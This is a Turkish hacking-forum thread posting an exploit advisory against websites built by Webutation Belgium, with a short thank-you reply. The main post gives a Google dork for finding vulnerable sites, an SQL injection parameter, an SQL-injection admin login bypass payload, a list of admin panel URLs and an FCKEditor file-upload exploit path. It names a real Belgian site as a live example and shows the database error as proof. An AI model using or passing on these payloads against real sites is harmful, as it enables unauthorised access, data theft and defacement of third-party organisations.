Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Webutation Belgium 2018 Multiple Vulnerabilities
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,377 / 1,377
Deneyim: 8 / 100
Rep Sayısı: 2785
Mesaj Sayısı: 6381
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Webutation Belgium 2018 Multiple Vulnerabilities
18.09.2018 01:21
################################################################################​#################

# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:Copyright © 2011 - 2018 Webutation site:be

© Webutation 2018

# SQL Injection Exploit =>

/activiteit.php?id=[SQL Inj]

# Admin Panel Login Path =>

/admin/login.php

# Admin Login Bypass Exploit :

Username : '=''or'

Password : '=''or'

# Useable Admin Panel Control URL Links =>

/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php

# FCKEditor Filemanager Exploit =>

TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html

TARGET/yourfilenamehere.txt

################################################################################​#################

# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ

# Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27

# SQL Database Error =>

FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 18.09.2018 Tarihinde, Saat: 09:31 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimiçi
Seviye Puanı: 36
Yaşam Puanı: 885 / 885
Deneyim: 41 / 100
Rep Sayısı: 562
Mesaj Sayısı: 1923
Üyelik Tarihi: 06.02.2017
     
Yorum: #2
RE : Webutation Belgium 2018 Multiple Vulnerabilities
18.09.2018 08:26
Teşekkürler, Emeğine Sağlık.
(Bu konu en son: 18.09.2018 Tarihinde, Saat: 09:32 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

Allah’tan utanmayan insanlardan da utanmaz…
Alinti



1 Ziyaretçi